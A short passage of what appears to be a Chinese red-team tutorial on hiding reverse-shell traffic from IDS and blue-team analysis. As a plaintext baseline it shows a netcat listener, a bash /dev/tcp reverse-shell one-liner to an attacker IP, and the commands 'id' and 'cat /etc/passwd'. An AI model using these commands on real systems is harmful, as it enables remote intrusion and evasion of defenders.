流量加密
使用Openssl反弹加密shell
如果反弹shell都是明文传输,当内网有IDS或者防护软件就会进行流量分析,攻击特征很快被发现。
如果蓝队对攻击流量回溯分析,就可以复现攻击的过程,此时红队攻击就会被暴露出来。
使用wireshark抓包直接看到输入的命令和返回信息,这些危险命令会被防火墙或者IPS检测,所以需要对这些信息进行混淆或加密。
未加密传输
攻击机:192.168.31.217
目标机:192.168.152.130
攻击机执行命令
nc -l 8080
目标机(kali)执行命令
bash -i >& /dev/tcp/192.168.31.217/8080 0>&1
反弹成功
随意输入两个命令,再去wireshark内分析流量
id
cat /etc/passwd